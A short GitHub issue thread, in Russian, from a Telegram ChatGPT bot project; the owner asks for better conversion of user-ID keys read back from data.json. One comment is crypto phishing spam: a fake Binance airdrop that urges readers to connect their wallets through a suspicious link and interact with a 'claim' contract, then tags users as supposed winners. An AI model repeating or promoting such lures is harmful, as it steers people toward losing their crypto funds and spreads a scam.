### ISSUE TITLE
Изменить способ чтения ключей в data.json 

### ISSUE THREAD

**Issue by kxkw** [kxkw/chatgpt-telegram-bot#32]
При сохранении в файл ключей с айди пользователей они становятся строками, и при повторном чтении из файла их приходится конвертировать на интегер. Сделать более эффективную конвертацию

**Comment by kxkw** [comment]
Строчка 172 в `main.py`

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @sunwaylive, @TechMarinar, @ahmethedev, @CSN7841, @TWS-YIFEI, @Coinsintegrity, @Michaela813, @1500256797, @sardinhatrader89, @Lenglemetz
